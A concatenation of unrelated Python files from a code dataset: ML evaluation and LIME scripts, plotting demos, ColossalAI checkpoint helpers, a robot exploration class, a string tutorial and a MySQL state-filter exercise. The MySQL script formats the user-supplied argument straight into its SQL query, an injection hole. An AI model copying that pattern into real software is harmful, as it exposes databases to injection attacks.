ML4Prediciton.Classifier(None, None, algorithm, None, train_features, train_labels, test_features, test_labels)\n auc_, recall_p, recall_n, acc, prc, rc, f1 = cl.leave1out_validation()\n\n # 2. question answer classifier\n # auc_, recall_p, recall_n, acc, prc, rc, f1 = rq_classifier(train_features, train_labels, test_features, test_labels)\n\n accs.append(acc)\n prcs.append(prc)\n rcs.append(rc)\n f1s.append(f1)\n\n aucs.append(auc_)\n rcs_p.append(recall_p)\n rcs_n.append(recall_n)\n\n if ASE:\n cl = ML4Prediciton.Classifier(None, None, algorithm, None, ASE_train_features, ASE_train_labels, ASE_test_features,\n ASE_test_labels)\n auc_, recall_p, recall_n, acc, prc, rc, f1 = cl.leave1out_validation()\n a_accs.append(acc)\n a_prcs.append(prc)\n a_rcs.append(rc)\n a_f1s.append(f1)\n\n a_aucs.append(auc_)\n a_rcs_p.append(recall_p)\n a_rcs_n.append(recall_n)\n\n print('')\n print('{} leave one out mean: '.format('10-90'))\n print('Accuracy: {:.1f} -- Precision: {:.1f} -- +Recall: {:.1f} -- F1: {:.1f} -- AUC: {:.3f}'.format(\n np.array(accs).mean() * 100, np.array(prcs).mean() * 100, np.array(rcs).mean() * 100,\n np.array(f1s).mean() * 100, np.array(aucs).mean()))\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: {:.3f}'.format(np.array(aucs).mean(), np.array(rcs_p).mean(),\n np.array(rcs_n).mean()))\n print('---------------')\n\n print('')\n print('{} ASE leave one out mean: '.format('10-90'))\n print('Accuracy: {:.1f} -- Precision: {:.1f} -- +Recall: {:.1f} -- F1: {:.1f} -- AUC: {:.3f}'.format(\n np.array(a_accs).mean() * 100, np.array(a_prcs).mean() * 100, np.array(a_rcs).mean() * 100,\n np.array(a_f1s).mean() * 100, np.array(a_aucs).mean()))\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: {:.3f}'.format(np.array(a_aucs).mean(), np.array(a_rcs_p).mean(),\n np.array(a_rcs_n).mean()))\n print('---------------')\n\n def predictASE(self, path_patch_sliced):\n cnt = 0\n available_patchids = []\n deduplicated_patchids = pickle.load(open('utils/deduplicated_name.pickle', 'rb'))\n with open('data/bugreport_patch.txt', 'r+') as f:\n for line in f:\n # project_id = line.split('$$')[0].strip()\n bugreport_summary = line.split('$$')[1].strip()\n # bugreport_description = line.split('$$')[2].strip()\n patch_id = line.split('$$')[3].strip()\n commit_content = line.split('$$')[4].strip()\n # label = int(float(line.split('$$')[5].strip()))\n # skip none and duplicated cases\n if bugreport_summary != 'None' and commit_content != 'None' and patch_id in deduplicated_patchids:\n available_patchids.append(patch_id)\n print('available patch number: {}'.format(len(available_patchids)))\n features_ASE, labels = [], []\n cnt = 0\n for root, dirs, files in os.walk(path_patch_sliced):\n for file in files:\n if file.endswith('$cross.json'):\n cnt += 1\n # # file: patch1-Closure-9-Developer-1.patch\n # name_part = file.split('.')[0]\n # name = '-'.join(name_part.split('-')[:-1])\n # label = 1 if root.split('/')[-4] == 'Correct' else 0\n # project = name.split('-')[1]\n # id = name.split('-')[2]\n # project_id = project + '-' + id\n # feature_json = root + '_cross.json'\n\n # file: patch1$.json\n name = file.split('$cross')[0]\n id = root.split('/')[-1]\n project = root.split('/')[-2]\n label = 1 if root.split('/')[-3] == 'Correct' else 0\n tool = root.split('/')[-4]\n patch_id_test = '-'.join([name, project, id, tool])\n patch_id_tmp = '-'.join([name+'_1', project, id, tool])\n # only consider the patches that have associated bug report\n if patch_id_test not in available_patchids and patch_id_tmp not in available_patchids:\n # print('name: {}'.format(patch_id_test))\n continue\n feature_json = os.path.join(root, file)\n try:\n with open(feature_json, 'r+') as f:\n vector_str = json.load(f)\n vector_ML = np.array(list(map(float, vector_str)))\n except Exception as e:\n print(e)\n continue\n features_ASE.append(vector_ML)\n labels.append(label)\n # print('collecting {}'.format(project_id))\n # print('cnt js: {}'.format(cnt))\n features_ASE = np.array(features_ASE)\n labels = np.array(labels)\n cl = ML4Prediciton.Classifier(features_ASE, labels, 'lr', 10)\n cl.cross_validation()\n\n def statistics(self, embedding_method,):\n dataset_json = pickle.load(open('../data/bugreport_patch_json_' + embedding_method + '.pickle', 'rb'))\n project_ids = list(dataset_json.keys())\n\n plt_data = []\n index = []\n for project_id in project_ids:\n value = dataset_json[project_id]\n correct, incorrect = 0, 0\n for p in range(1, len(value)):\n _, label = value[p][0], value[p][1]\n if label == 1:\n correct +=1\n elif label == 0:\n incorrect += 1\n index.append(project_id)\n plt_data.append([correct, incorrect])\n\n print(len(index))\n img_df = pd.DataFrame(np.array(plt_data), index, columns=['correct', 'incorrect'])\n img_df.plot(kind='bar', rot=0)\n plt.show()\n\nif __name__ == '__main__':\n embedding = 'bert'\n e = Experiment()\n\n # e.predict_10fold(embedding)\n # e.statistics(embedding+'(description)')\n\n # e.predict_10fold(embedding+'(description)', algorithm='lr')\n # e.predict_leave1out(embedding+'(description)', times=30, algorithm='lr')\n e.predict_leave1out_10fold(embedding+'(description)', times=10, algorithm='lr', ASE=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":17989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268962334","text":"import json\nimport torch\nfrom transformers import AutoTokenizer, AutoModel, AutoModelForSequenceClassification\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom lime.lime_text import LimeTextExplainer\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\nmodel_path = \"models/scibert_best/network-snapshot-latest\"\nmodel = AutoModelForSequenceClassification.from_pretrained(model_path)\nmodel.eval()\nmodel.to(device)\n\nmodel_name = 'allenai/scibert_scivocab_uncased'\ntokenizer = AutoTokenizer.from_pretrained(model_name)\n\n# with open(\"data/test/stylegan.json\", \"r\") as f:\n# data = json.load(f)\n# sections = list(map(lambda x: x[\"text\"], data[\"sections\"]))\n\n# print(len(sections))\n\nclass_names = ['positive','negative', 'neutral']\n\ndef predictor(texts):\n print(len(texts))\n outputs = model(**tokenizer(texts, return_tensors=\"pt\", padding=True))\n probas = F.softmax(outputs.logits).detach().numpy()\n return probas\n\nexplainer = LimeTextExplainer(class_names=class_names)\n\nstr_to_predict = \"Our goal is to predict whether a paper is going to be rejected or accepted at a conference, just from the contentsof that paper. For this task, we utilized thePeerReaddataset [1], which contains about 14k reviews, papersand their acceptance decision of up until 2017. We use two different approaches to embed text into a vectorspace: a Bag of Words embedding and pre-trained BERT model [2]. Both approaches have a feed-forwardneural network on top to determine the final acceptance prediction. For the majority of the implementation1of our networks, we used the packages Pytorch [3], Pytorch Lightning [4], Huggingface Transformers [5] andSentence-Transformers [6]. For simplified logging and visualization we used the package Weights & Biases [7].\"\nexp = explainer.explain_instance(str_to_predict, predictor, num_features=20, num_samples=100)\n# exp.show_in_notebook(text=str_to_predict)\nexp.save_to_file('lime.html')\n\n# tokenized_sections = tokenizer(sections, truncation=True, padding=\"max_length\", max_length=512)\n\n# with torch.no_grad():\n# input = {key: torch.tensor(val).to(device) for key, val in tokenized_sections.items()}\n# output = model(**input)\n# print(output)\n# prediction = output.logits.mean(axis=0)\n# print(prediction)\n# prob = torch.nn.functional.softmax(prediction, dim=0)\n# print(prob)","sub_path":"lime_explainer.py","file_name":"lime_explainer.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"541325257","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndf=pd.DataFrame(np.random.randn(10,4),index=pd.date_range('1/1/2000',periods=10), columns=list('ABCD'))\nprint(df.describe())\ndf.plot()\nplt.savefig(\"plot.png\", dpi=300)#jpg,png,svg\nplt.show()\n\n\n\ndf=pd.DataFrame(np.random.rand(10,4),columns=['a','b','c','d'])\nprint(df.describe())\ndf.plot.bar()\nplt.savefig(\"plotbar.png\", dpi=300)#jpg,png,svg\ndf.plot.bar(stacked=True)\nplt.savefig(\"plotbarstacked.png\", dpi=300)#jpg,png,svg\ndf.plot.barh()\nplt.savefig(\"plotbarh.png\", dpi=300)#jpg,png,svg\ndf.plot.barh(stacked=True)\nplt.savefig(\"plotbarhstacked.png\", dpi=300)#jpg,png,svg\nplt.show()\n\n\ndf=pd.DataFrame({'a':np.random.randn(1000)+1,'b':np.random.randn(1000),'c':\nnp.random.randn(1000) - 1}, columns=['a', 'b', 'c'])\ndf.plot.hist(bins=20)\nplt.savefig(\"plothist.png\", dpi=300)#jpg,png,svg\nplt.show()\n\ndf = pd.DataFrame(np.random.rand(10, 5), columns=['A', 'B', 'C', 'D', 'E'])\ndf.plot.box()\nplt.savefig(\"plotbox.png\", dpi=300)#jpg,png,svg\ndf.plot.area()\nplt.savefig(\"plotarea.png\", dpi=300)#jpg,png,svg\nplt.show()\n\ndf = pd.DataFrame(np.random.rand(50, 4), columns=['a', 'b', 'c', 'd'])\ndf.plot.scatter(x='a', y='b')\nplt.savefig(\"plotscatter.png\", dpi=300)#jpg,png,svg\nplt.show()\n\ndf = pd.DataFrame(3 * np.random.rand(4), index=['a', 'b', 'c', 'd'], columns=['x'])\ndf.plot.pie(subplots=True)\nplt.savefig(\"plotpie.png\", dpi=300)#jpg,png,svg\nplt.show()","sub_path":"my_pandas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"259819509","text":"import os\nimport os.path as osp\nimport re\nfrom typing import Tuple\n\nimport torch\n\nfrom .context import Config\nfrom .context.parallel_mode import ParallelMode\nfrom .core import global_context as gpc\n\n__all__ = [\n 'get_checkpoint_path',\n 'get_latest_checkpoint_path',\n 'get_latest_checkpoint_pattern',\n 'save_checkpoint',\n 'load_checkpoint'\n]\n\n\ndef unwrap_config(config: Config):\n '''\n unwrap Config objects to normal dicts\n '''\n config_dict = dict()\n for k, v in config.items():\n if isinstance(v, dict):\n config_dict[k] = unwrap_config(v)\n else:\n config_dict[k] = v\n\n return config_dict\n\n\ndef _get_ranks_name():\n # tensor parallel\n tp_local_rank = 0\n if gpc.is_initialized(ParallelMode.TENSOR):\n tp_local_rank = gpc.get_local_rank(ParallelMode.TENSOR)\n\n # pipeline parallel\n pp_local_rank = 0\n if gpc.is_initialized(ParallelMode.PIPELINE):\n pp_local_rank = gpc.get_local_rank(ParallelMode.PIPELINE)\n\n ranks_name = f'tp{tp_local_rank}-pp{pp_local_rank}'\n return ranks_name\n\n\ndef _get_standard_checkpoint_filename(epoch: int, suffix: str = ''):\n ranks_name = _get_ranks_name()\n return f'epoch{epoch}-{ranks_name}{suffix}.pt'\n\n\ndef get_checkpoint_path(checkpoint_dir: str, epoch: int, suffix: str = ''):\n '''This is a function to generate the checkpoint path from the (checkpoint_dir, epoch, suffix, gpu_parallel_rank) tuple.\n This is useful during generation and recuperation of the checkpoint.\n\n :param checkpoint_dir: set up a directory for saving checkpoints\n :type checkpoint_dir: str\n :param epoch: epoch number (indicate how many epochs have you trained this model)\n :type epoch: int\n :param suffix: additional notation to specify the model or checkpoint, defaults to ''\n :type suffix: str, optional\n :return: checkpoint path to be generated \n :rtype: path\n '''\n ckpt_filename = _get_standard_checkpoint_filename(epoch, suffix)\n return os.path.join(checkpoint_dir, ckpt_filename)\n\n\ndef _ensure_directory_exists(filename: str):\n # ensure the directory exists\n dir = os.path.dirname(filename)\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n\ndef get_latest_checkpoint_pattern(suffix: str = ''):\n '''Generate Regular expression of latest checkpoint's pattern\n\n :param suffix: additional notation to specify the model or checkpoint, defaults to ''\n :type suffix: str, optional\n :return: checkpoint pattern\n :rtype: regular expression\n '''\n ranks_name = _get_ranks_name()\n ckpt_pattern = re.compile(f'epoch(\\d+)-{ranks_name}{suffix}\\.pt')\n return ckpt_pattern\n\n\ndef get_latest_checkpoint_path(checkpoint_dir: str, suffix: str = ''):\n '''This is a function to retrieve the latest checkpoint path from the (checkpoint_dir, suffix, gpu_parallel_rank) tuple.\n This is useful during recuperation of the checkpoint, especially when you do not know the epoch number.\n\n :param checkpoint_dir: directory for saving checkpoints\n :type checkpoint_dir: str\n :param suffix: additional notation to specify the model or checkpoint, defaults to ''\n :type suffix: str, optional\n :raises FileNotFoundError: raise error when we cannot find the latest checkpoint file with inputs given\n :return: the latest checkpoint path to be retrieved \n :rtype: path\n '''\n CKPT_NAME_PAT = get_latest_checkpoint_pattern(suffix=suffix)\n\n last_epoch = -1\n assert osp.isdir(checkpoint_dir), f'{checkpoint_dir} is not a directory'\n\n for filename in os.listdir(checkpoint_dir):\n ret = CKPT_NAME_PAT.match(filename)\n if ret:\n epoch = int(ret[0].split('-')[0].lstrip('epoch'))\n if epoch > last_epoch:\n last_epoch = epoch\n\n if last_epoch == -1:\n ranks_name = _get_ranks_name()\n raise FileNotFoundError(f\"Cannot find the latest checkpoint file for {ranks_name} in {checkpoint_dir}\")\n else:\n target_file = _get_standard_checkpoint_filename(last_epoch, suffix=suffix)\n path = osp.join(checkpoint_dir, target_file)\n return path\n\n\ndef save_checkpoint(checkpoint_path: str,\n epoch: int,\n model: torch.nn.Module,\n optimizer: torch.optim.Optimizer,\n lr_scheduler: torch.optim.lr_scheduler._LRScheduler = None,\n **kwargs):\n '''Given a directory to store the checkpoints, saves all the training components' parameters or buffers, such as model, optimizer, lr_scheduler and etc. into a checkpoint dictionary. \n \n This method can be used for both colosalai nn.BaseModel and normal pytorch nn.Module.\n\n\n :param checkpoint_path: set up a directory for saving checkpoints\n :type checkpoint_path: str\n :param epoch: epoch number (indicate how many epochs have you trained this model)\n :type epoch: int\n :param model: model to be registered\n :type model: torch.nn.Module\n :param optimizer: optimizer to be registered\n :type optimizer: torch.optim.Optimizer\n :param lr_scheduler: lr_scheduler to be registered, defaults to None\n :type lr_scheduler: torch.optim.lr_scheduler._LRScheduler, optional\n '''\n # for compatibility with normal pytorch nn.Module\n if hasattr(model, 'state_dict_for_save_checkpoint'):\n model_sd = model.state_dict_for_save_checkpoint()\n else:\n model_sd = model.state_dict()\n\n # ckpt container\n checkpoint = {\n 'epoch': epoch,\n 'model': model_sd,\n 'optimizer': optimizer.state_dict(),\n **kwargs\n }\n if lr_scheduler is not None:\n checkpoint['lr_scheduler'] = lr_scheduler.state_dict()\n\n _ensure_directory_exists(checkpoint_path)\n torch.save(checkpoint, checkpoint_path)\n\n\ndef load_checkpoint(checkpoint_path: str,\n model: torch.nn.Module,\n optimizer: torch.optim.Optimizer,\n lr_scheduler: torch.optim.lr_scheduler._LRScheduler = None,\n finetune: bool = False,\n strict: bool = True) -> Tuple:\n '''Loads the checkpoint file. \n If finetune is False, then we intend to continue/resume the training process from the checkpoint given. \n So we copy parameters and buffers from state_dict into these modules(model, optimizer,lr_scheduler) and its descendants. \n If finetune is True, then only the weights and buffers of model should be reload.\n If strict is True, then the keys of state_dict must exactly match the keys returned by this module’s state_dict() function.\n \n :param checkpoint_path: the exact and matched checkpoint_path directory to retrieve appropriate state_dict\n :type checkpoint_path: str\n :param model: model to reload parameters and buffers\n :type model: torch.nn.Module\n :param optimizer: optimizer to recuperate\n :type optimizer: torch.optim.Optimizer \n :param lr_scheduler: lr_scheduler to recuperate, defaults to None\n :type lr_scheduler: torch.optim.lr_scheduler._LRScheduler, optional\n :param finetune: whether to finetune the model with new dataset or continue the pre-training, defaults to False\n :type finetune: bool, optional\n :param strict: whether to strictly enforce that the keys in\n :attr:`state_dict` of the checkpoint match the names of\n parameters and buffers in model., defaults to True\n :type strict: bool, optional\n :raises ValueError: raise error if the model/optimizer cannot successfully be recuperated\n :return: (the epoch number of the checkpoint retrieved, the checkpoint retrieved)\n :rtype: Tuple\n\n '''\n # Load the checkpoint.\n checkpoint = torch.load(checkpoint_path, map_location='cpu')\n try:\n last_epoch = checkpoint.pop('epoch') if not finetune else 0\n model.load_state_dict(checkpoint.pop('model'), strict=strict)\n except KeyError:\n raise ValueError('Checkpoint is corrupted')\n\n if not finetune:\n try:\n optimizer.load_state_dict(checkpoint.pop('optimizer'))\n except KeyError:\n raise ValueError('Checkpoint is corrupted')\n\n if lr_scheduler is not None and 'lr_scheduler' in checkpoint:\n lr_scheduler.load_state_dict(checkpoint.pop('lr_scheduler'))\n\n return last_epoch, checkpoint\n","sub_path":"colossalai/checkpointing.py","file_name":"checkpointing.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"343320658","text":"import re\nfrom utils import *\nfrom time import time, sleep\n\n\nclass Robot:\n def __init__(self, exploration_status, facing, discovered_map):\n self.exploration_status = exploration_status\n self.center = 17\n self.facing = facing\n self.discovered_map = discovered_map\n self._probability_map = [[[0.0, 0.0] for _ in range(15)] for _ in range(20)]\n self._arrow_map = [[[0, 0, 0, 0] for _ in range(15)] for _ in range(20)]\n self._sensors = [\n {\"mount_loc\": SWS, \"facing\": WEST, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NWS, \"facing\": WEST, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NWS, \"facing\": NORTH, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NS, \"facing\": NORTH, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NES, \"facing\": NORTH, \"range\": 4, \"blind_spot\": 0},\n {\"mount_loc\": NS, \"facing\": EAST, \"range\": 5, \"blind_spot\": 0}\n ]\n\n self.num_sensor_readings = 11\n regex_str = '^(\\d,){%s}$' % (len(self._sensors) * self.num_sensor_readings)\n self._readings_regex = re.compile(regex_str)\n\n def _mark_probability(self, cell, count, total):\n y, x = get_coordinates(cell)\n print(y, x, count, total)\n\n if self._probability_map[y][x][0] == 1.0 and self._probability_map[y][x][1] == 0.0:\n print('perm')\n return\n\n self._probability_map[y][x][0] += count\n self._probability_map[y][x][1] += total\n\n prob_obstacle = self._probability_map[y][x][0]\n prob_total = self._probability_map[y][x][1]\n\n print(y, x, prob_obstacle, prob_total)\n\n if not self.exploration_status[y][x]:\n self.exploration_status[y][x] = 1\n\n if prob_obstacle / prob_total > 0.5:\n self.discovered_map[y][x] = 1\n return 1\n else:\n self.discovered_map[y][x] = 0\n return 0\n\n def _mark_permanent(self, cell):\n y, x = get_coordinates(cell)\n\n self._probability_map[y][x][0] = 1.0\n self._probability_map[y][x][1] = 0.0\n\n if not self.exploration_status[y][x]:\n self.exploration_status[y][x] = 1\n\n self.discovered_map[y][x] = 0\n\n return True\n\n def _mark_arrow_taken(self, y, x, facing):\n opposite = (facing + 2) % 4\n\n self._arrow_map[y][x][facing] = 1\n self._arrow_map[y][x][opposite] = 1\n\n return True\n\n def in_efficiency_limit(self):\n if (self.center in range(257, 270) and self.facing == EAST) \\\n or (self.center in range(28, 284, 15) and self.facing == SOUTH) \\\n or (self.center in range(32, 45) and self.facing == WEST) \\\n or (self.center in range(18, 274, 15) and self.facing == NORTH):\n return True\n\n return False\n\n def mark_robot_standing(self):\n robot_cells = get_robot_cells(self.center)\n updated_cells = {}\n mark_permanent = self._mark_permanent\n for cell in robot_cells:\n if mark_permanent(cell):\n updated_cells[cell] = 0\n\n return updated_cells\n\n def get_completion_percentage(self):\n count = 0.0\n for row in self.exploration_status:\n for i in row:\n count += i\n\n return count / 3.0\n\n def is_complete(self, explore_limit, start_time, time_limit):\n completion = self.get_completion_percentage\n return completion() >= explore_limit \\\n or float(time() - start_time >= time_limit)\n\n def turn_robot(self, sender, direction):\n if direction == FORWARD:\n return\n\n if direction == BACKWARD:\n sender.send_arduino(get_arduino_cmd(LEFT))\n self.facing = (self.facing + LEFT) % 4\n direction = LEFT\n sender.wait_arduino('D')\n\n sender.send_arduino(get_arduino_cmd(direction))\n self.facing = (self.facing + direction) % 4\n\n sender.wait_arduino('D')\n\n if ARROW_SCAN:\n self.check_arrow(sender)\n\n def move_robot(self, sender, direction):\n self.turn_robot(sender, direction)\n\n sender.send_arduino(get_arduino_cmd(FORWARD))\n\n if self.facing == NORTH:\n self.center += 15\n elif self.facing == EAST:\n self.center += 1\n elif self.facing == SOUTH:\n self.center -= 15\n elif self.facing == WEST:\n self.center -= 1\n\n updated_cells = self.mark_robot_standing()\n\n sender.wait_arduino('D')\n\n if ARROW_SCAN:\n self.check_arrow(sender)\n\n return updated_cells\n\n def check_free(self, direction):\n true_bearing = (self.facing + direction) % 4\n\n robot_cells = get_robot_cells(self.center)\n\n try:\n if true_bearing == NORTH:\n y, x = get_coordinates(robot_cells[0])\n y += 1\n if y < 0 or x < 0:\n raise IndexError\n return not (self.discovered_map[y][x] == 1 or self.discovered_map[y][x + 1] == 1\n or self.discovered_map[y][x + 2] == 1)\n elif true_bearing == EAST:\n y, x = get_coordinates(robot_cells[2])\n x += 1\n if y < 2 or x < 0:\n raise IndexError\n return not (self.discovered_map[y][x] == 1 or self.discovered_map[y - 1][x] == 1\n or self.discovered_map[y - 2][x] == 1)\n elif true_bearing == SOUTH:\n y, x = get_coordinates(robot_cells[6])\n y -= 1\n if y < 0 or x < 0:\n raise IndexError\n return not (self.discovered_map[y][x] == 1 or self.discovered_map[y][x + 1] == 1\n or self.discovered_map[y][x + 2] == 1)\n elif true_bearing == WEST:\n y, x = get_coordinates(robot_cells[0])\n x -= 1\n if y < 2 or x < 0:\n raise IndexError\n return not (self.discovered_map[y][x] == 1 or self.discovered_map[y - 1][x] == 1\n or self.discovered_map[y - 2][x] == 1)\n except IndexError:\n return False\n\n def is_arrow_possible(self):\n arrow_range = 1\n y, x = get_coordinates(self.center)\n discovered_map = self.discovered_map\n arrow_map = self._arrow_map\n facing = self.facing\n\n try:\n for distance in range(2, arrow_range + 2):\n if facing == NORTH:\n new_x = x - distance\n if new_x < 0:\n raise IndexError\n print('checking %s,%s %s,%s %s,%s' % (y, new_x, y + 1, new_x, y - 1, new_x))\n obstacles = [discovered_map[y][new_x] == 1, discovered_map[y + 1][new_x] == 1,\n discovered_map[y - 1][new_x] == 1]\n marked = [arrow_map[y][new_x][facing], arrow_map[y + 1][new_x][facing],\n arrow_map[y][new_x][facing]]\n if any(obstacles) and not any(marked):\n self._mark_arrow_taken(y, new_x, facing)\n self._mark_arrow_taken(y + 1, new_x, facing)\n self._mark_arrow_taken(y - 1, new_x, facing)\n return True\n elif facing == EAST:\n new_y = y + distance\n print('checking %s,%s %s,%s %s,%s' % (new_y, x, new_y, x + 1, new_y, x - 1))\n obstacles = [discovered_map[new_y][x] == 1, discovered_map[new_y][x + 1] == 1,\n discovered_map[new_y][x - 1] == 1]\n marked = [arrow_map[new_y][x][facing], arrow_map[new_y][x + 1][facing],\n arrow_map[new_y][x - 1][facing]]\n if any(obstacles) and not any(marked):\n self._mark_arrow_taken(new_y, x, facing)\n self._mark_arrow_taken(new_y, x + 1, facing)\n self._mark_arrow_taken(new_y, x - 1, facing)\n return True\n elif facing == SOUTH:\n new_x = x + distance\n print('checking %s,%s %s,%s %s,%s' % (y, new_x, y + 1, new_x, y - 1, new_x))\n obstacles = [discovered_map[y][new_x] == 1, discovered_map[y + 1][new_x] == 1,\n discovered_map[y - 1][new_x] == 1]\n marked = [arrow_map[y][new_x][facing], arrow_map[y + 1][new_x][facing],\n arrow_map[y][new_x][facing]]\n if any(obstacles) and not any(marked):\n self._mark_arrow_taken(y, new_x, facing)\n self._mark_arrow_taken(y + 1, new_x, facing)\n self._mark_arrow_taken(y - 1, new_x, facing)\n return True\n elif facing == WEST:\n new_y = y - distance\n if new_y < 0:\n raise IndexError\n print('checking %s,%s %s,%s %s,%s' % (new_y, x, new_y, x + 1, new_y, x - 1))\n obstacles = [discovered_map[new_y][x] == 1, discovered_map[new_y][x + 1] == 1,\n discovered_map[new_y][x - 1] == 1]\n marked = [arrow_map[new_y][x][facing], arrow_map[new_y][x + 1][facing],\n arrow_map[new_y][x - 1][facing]]\n if any(obstacles) and not any(marked):\n self._mark_arrow_taken(new_y, x, facing)\n self._mark_arrow_taken(new_y, x + 1, facing)\n self._mark_arrow_taken(new_y, x - 1, facing)\n return True\n return False\n except IndexError:\n return False\n\n def check_arrow(self, sender):\n if self.is_arrow_possible():\n y, x = get_coordinates(self.center)\n msg = '%s,%s,%s' % (x, y, self.facing)\n enable_print()\n sender.send_rpi(msg)\n sender.wait_rpi('Y')\n disable_print()\n\n else:\n print(get_coordinates(self.center), 'false')\n\n def get_sensor_readings(self, sender):\n mark_probability = self._mark_probability\n\n sender.send_arduino('g')\n readings = sender.wait_arduino(self._readings_regex, sensor_reading=True)\n print('Readings: %s' % readings)\n readings = readings.split(',')\n\n readings = [int(x) for x in readings]\n\n readings = [readings[i:i + len(self._sensors)] for i in range(0, len(readings), len(self._sensors))]\n\n readings = [[row[i] for row in readings] for i, _ in enumerate(readings[0])]\n print(readings)\n robot_cells = get_robot_cells(self.center)\n sensors = self._sensors[:]\n sensor_index = sensors.index\n updated_cells = {}\n\n for sensor in sensors:\n true_facing = (sensor[\"facing\"] + self.facing) % 4\n\n offset = self.facing * 2\n true_mounting = (sensor[\"mount_loc\"] + offset) % 8\n if true_mounting == NWS:\n origin = robot_cells[0]\n elif true_mounting == NS:\n origin = robot_cells[1]\n elif true_mounting == NES:\n origin = robot_cells[2]\n elif true_mounting == WS:\n origin = robot_cells[3]\n elif true_mounting == ES:\n origin = robot_cells[5]\n elif true_mounting == SWS:\n origin = robot_cells[6]\n elif true_mounting == SS:\n origin = robot_cells[7]\n elif true_mounting == SES:\n origin = robot_cells[8]\n elif true_mounting == CS:\n origin = robot_cells[4]\n\n y, x = get_coordinates(origin)\n read_range = list(range(sensor[\"blind_spot\"] + 1, sensor[\"range\"] + 1))\n\n reading = readings[sensor_index(sensor)]\n print('Sensor', sensor_index(sensor))\n\n weight = 4\n for cell in read_range:\n try:\n if true_facing == NORTH:\n to_explore = (y + cell, x)\n elif true_facing == EAST:\n to_explore = (y, x + cell)\n elif true_facing == SOUTH:\n to_explore = (y - cell, x)\n elif true_facing == WEST:\n to_explore = (y, x - cell)\n\n if to_explore[0] < 0 or to_explore[1] < 0:\n print('ie')\n raise IndexError\n\n cell_index = get_grid_index(to_explore[0], to_explore[1])\n\n if mark_probability(cell_index, weight * reading.count(cell), weight * self.num_sensor_readings):\n raise IndexError\n\n weight /= 2\n\n except IndexError:\n break\n print('br')\n\n return updated_cells\n\n def get_explore_string(self):\n exploration_status = self.exploration_status[:]\n\n explore_str = ''.join(str(grid) for row in exploration_status for grid in row)\n\n explore_status_string = '11%s11' % explore_str\n explore_status_string = str(hex(int(explore_status_string, 2)))\n\n file = open(\"explore_string.txt\", \"w+\")\n file.write(explore_status_string[2:])\n file.close()\n\n return explore_status_string[2:]\n\n def get_map_string(self):\n discovered_map = self.discovered_map[:]\n\n map_str = ''.join(str(grid) for row in discovered_map for grid in row if grid != 2)\n\n pad_length = (8 - (len(map_str) % 8)) % 8\n pad = '0' * pad_length\n\n map_string = '1111%s%s' % (map_str, pad)\n map_string = str(hex(int(map_string, 2)))\n\n map_string = map_string[3:]\n\n file = open(\"map_string.txt\", \"w+\")\n file.write(map_string)\n file.close()\n\n return map_string\n","sub_path":"Algo,Android,RPI/Algorithm/MDP_12_03_19/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":14108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345906473","text":"# Create string using Four ways\n# first is \" \" (Double Quotation)\n# Second is ' ' (Single Quotation)\n# Third is \"\"\" \"\"\" (Triple Double Quotation) it's use for sentences\n# Four is ''' ''' (Triple Single Quotation) it's use for sentences\n# its wrong method \" ' or ' \"\n\ntext1 = \"Hello World!\"\nprint(text1)\n\ntext2 = 'Hello World!'\nprint(text2)\n\ntext3 = \"\"\"Hello\nMy name is Raza\nLearning Python\"\"\"\nprint(text3)\n\ntext3 = '''Hello\nMy name is Raza\nLearning Python'''\nprint(text3)\n","sub_path":"string_1.py","file_name":"string_1.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562281559","text":"#!/usr/bin/python3\n\"\"\"\nLists all states from the database hbtn_0e_0_usa where name matches\nwith the given argument.\n\"\"\"\n\nimport MySQLdb\nfrom sys import argv\n\n\nif __name__ == '__main__':\n try:\n db = MySQLdb.connect(\n host=\"localhost\",\n port=3306,\n user=argv[1],\n passwd=argv[2],\n db=argv[3],\n charset=\"utf8\"\n )\n cursor = db.cursor()\n cursor.execute(\n \"SELECT * FROM states WHERE name LIKE '{:s}' ORDER BY id ASC\"\n .format(argv[4])\n )\n rows = cursor.fetchall()\n for row in rows:\n if row[1] == argv[4]:\n print(row)\n cursor.close()\n db.close()\n except Exception as e:\n print(\"Error: {}\".format(e))\n","sub_path":"0x0F-python-object_relational_mapping/2-my_filter_states.py","file_name":"2-my_filter_states.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"239126905","text":"import requests\nimport json\nimport os\nimport numpy as np\nimport cv2\nimport pandas as pd\n\n# #######-------------image client------------#######\n\npeoples = ['jiangzemin', 'hujintao', 'xijinping', 'dengxiaoping', 'wenjiabao', 'maozedong', 'zhouenlai']\n\nresult = {}\n\n\nclass ImageEmbClass():\n \"Stores the paths to images for a given class\"\n\n def __init__(self, class_name, name, emb_vector):\n self.cls = class_name\n self.name = name\n self.emb = emb_vector\n\n def __str__(self):\n return self.cls + ',' + self.name + ', ' + str(len(self.emb))\n\n def __len__(self):\n return len(self.cls)\n\n\ndataset = []\n\n\nimage_dir = 'F:/baidu_crop/'\n\n# for i in image_pic:\n # img_path = os.path.join(image_dir, i)\n\n # 